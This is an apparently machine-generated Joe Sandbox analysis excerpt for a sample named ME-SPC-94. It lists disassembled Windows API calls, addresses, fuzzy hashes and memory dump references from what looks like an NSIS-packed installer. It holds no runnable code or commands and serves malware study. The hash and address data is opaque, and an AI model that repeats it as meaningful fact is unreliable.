                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                  • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                  • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                  • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                  • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                  • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                  • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                  • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                    • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                  • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID:
                                                  • API String ID: 2146148272-0
                                                  • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                  • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                  • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                  • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                  • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                  • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                  APIs
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0,00434000), ref: 00405A4C
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                  • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3751793516-0
                                                  • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                  • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                  • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                  • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                  • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                  APIs
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                    • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                    • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                  • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                  • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                  • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405195
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                    • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                  • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C01
                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                  • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                  • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                  • CloseHandle.KERNEL32(?), ref: 004056F5
                                                  Strings
                                                  • Error launching installer, xrefs: 004056D6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                  • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                  • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                  • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                  • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                  • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                  • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                  • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                  • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                  • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                  • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                  • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                  • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                  • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                  • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
